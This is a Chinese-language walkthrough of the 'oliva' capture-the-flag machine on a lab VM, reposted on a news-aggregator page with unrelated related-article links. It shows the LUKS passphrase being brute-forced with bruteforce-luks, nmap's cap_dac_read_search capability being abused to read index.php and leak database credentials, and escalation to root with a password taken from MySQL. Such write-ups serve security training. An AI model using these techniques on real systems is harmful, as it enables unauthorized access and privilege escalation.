当前位置: 首页 > news >正文

oliva-bruteforce-luks

news 2025/7/14 17:48:39
olivaeasyLUKS v2破解、bruteforce-luks工具使用、cryptsetup使用、cap_dac_read_search=eip、mysql使用

主机发现

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo netdiscover -i eth0 -r 192.168.44.148/24

服务扫描

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.148

22,80
访问hhtp首页,点击click
自动下载出oliva文件

LUKS v2 加密文件

file 查看是一份LUKS v2 加密文件

┌──(kali㉿kali)-[~/下载]
└─$ file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
┌──(kali㉿kali)-[~/下载]
└─$ sudo apt install bruteforce-luks一直爆破到第970多个
Password found: bebita

爆破获取加密口令后,我们使用cryptsetup打开该文

┌──(kali㉿kali)-[~/下载]
└─$ sudo cryptsetup luksOpen oliva olia_img
输入 oliva 的口令: bebita

打开后文件是在这个路径下创建的 /dev/mapper/olive_img,然后我们可以mount 命令挂载该文件。

mount  /dev/mapper/olive_img /mnt

或者使用文件管理器打开文件

cryptsetup open --type luks oliva oliva

进去里面可以看到一份密码

┌──(kali㉿kali)-[/media/kali/7839beec-705e-45c5-a982-3096ac116f6e]
└─$ cat mypass.txt 
Yesthatsmypass!

尝试用户名密码

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ssh oliva@192.168.44.148  
//用户:oliva
//密码:Yesthatsmypass!oliva@oliva:~$ cat user.txt 
HMVY0H8NgGJqbFzbgo0VMRm

提权

getcap 命令是在 Linux 系统中用于查看文件的特殊权限(capabilities)的工具。

oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep

使用linpeas.sh 提权脚本,也能发现
“cap_dac_read_search=eip”是指Linux操作系统中与文件访问权限相关的概念。“cap_dac”代表“任意访问能力”,指的是基于文件所有者、组和其他用户的权限。下面我们尝试使用nmap 打开如下的文件,获取mysql的账号密码,提示说是root的账号密码,尝试登录并不是。

nmap localhost -iL index.php
nmap -iL index.php-iL 批量扫描1.txt中的目标地址

猜测数据库密码是 Savingmypass

oliva@oliva:/var/www/html$ nmap localhost -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-22 14:46 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 29.96 seconds

登录数据库

oliva@oliva:/var/www/html$ mysql -u root -pSavingmypass
Enter password:             
Welcome to the MariaDB monitor.  Commands end with ; or \g.                                        
Your MariaDB connection id is 5                                                                                                                                                                
Server version: 10.11.3-MariaDB-1 Debian 12                                                         
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.                                
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.          
MariaDB [(none)]> show databases;                                                                  
+--------------------+                                                                                
| Database           |                                                                                
+--------------------+                                                                                
| easy               |                                                                               
| information_schema |                                                                                
| mysql              |                                                                               
| performance_schema |                                                                            
| sys                |                                                                                                                                                          
+--------------------+                                                       
5 rows in set (0,005 sec)                                                                           
MariaDB [(none)]> use easy
Reading table information for completion of table and column names                                
You can turn off this feature to get a quicker startup with -A                                 
Database changed                                                                                                                                                                               
MariaDB [easy]> show tables;                                                                                                                                                                   
+----------------+                                                                                                                                                                             
| Tables_in_easy |                                                                                                                                                                             
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)MariaDB [easy]> select * from logging-> ;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,003 sec)MariaDB [easy]> 

oliva@oliva:/var/www/html$ su root
Contraseña: //OhItwasEasy!root@oliva:~# cat rutflag.txt 
HMVnuTkm4MwFQNPmMJHRyW7
http://www.lryc.cn/news/383566.html

相关文章:

  • 图像超分辨率重建
  • 小米上架遇到的隐私协议问题
  • 【区分vue2和vue3下的element UI Message 消息提示组件,分别详细介绍属性,事件,方法如何使用,并举例】
  • 架构设计 - Nginx Lua 缓存配置
  • lua的GC
  • 基于python爬虫对豆瓣影评分析系统的设计与实现
  • 想让梦想照进现实?六西格玛绿带培训为你架起桥梁
  • 大数据面试题之HDFS
  • (9)农作物喷雾器
  • 智慧互联:Vatee万腾平台展现科技魅力
  • Charles抓包工具系列文章(四)-- Rewrite 重写工具
  • 【PB案例学习笔记】-24创建一个窗口图形菜单
  • 环境配置的相关问题
  • github配置可拉取项目到本地
  • Snippet-AndroidFontWeight
  • 选择合适的分类评价指标:传统指标与自定义指标的权衡
  • 数据结构-线性表的链式表示
  • DDL-表操作-数据类型
  • python实例代码 - 多层感知机预测销售情况
  • JVM专题十:JVM中的垃圾回收机制
  • MySQL入门学习-索引.创建索引
  • ChatGPT智能对话绘画系统 带完整的安装源代码包以及搭建教程
  • 巴中市红色旅游地管理系统
  • ROS2从入门到精通2-2:详解机器人3D可视化工具Rviz2与案例分析
  • 国企:2024年6月中国铁路相关招聘信息,6.27截止
  • React+TS前台项目实战(十九)-- 全局常用组件封装:带加载状态和清除等功能的Input组件实现
  • php composer 报错
  • 数据安全如何防护?迅软加密软件保护企业数据资产
  • Android 11 ,默认授予预置应用/APK 需要的权限,解决permission denied for window type 2003 问题。
  • RabbitMQ(消息队列)